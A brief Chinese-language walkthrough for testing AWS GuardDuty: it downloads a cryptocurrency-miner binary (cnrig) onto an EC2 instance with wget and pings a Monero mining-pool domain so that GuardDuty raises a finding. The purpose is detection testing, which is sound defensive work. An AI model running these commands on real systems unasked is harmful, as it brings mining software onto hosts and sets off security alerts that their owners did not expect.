模拟EC2中挖矿木马

1. 在 EC2 上执行如下命令，会下载一个恶意文件 cnrig-0.1.5-linux-x86_64；该文件是一个挖矿程序，此处仅作演示用，并不真正执行挖矿动作。

wget -o my_miner_test https://github.com/cnrig/cnrig/releases/download/v0.1.5-release/cnrig-0.1.5-linux-x86_64

1. 然后 ping 一下如下域名，用于触发 GuardDuty 检测的 vpc flow 流量、产生 GuardDuty finding：

ping xmr.pool.minergate.com

1. 几分钟后检查GuardDuty是否识别这个攻击，产生告警。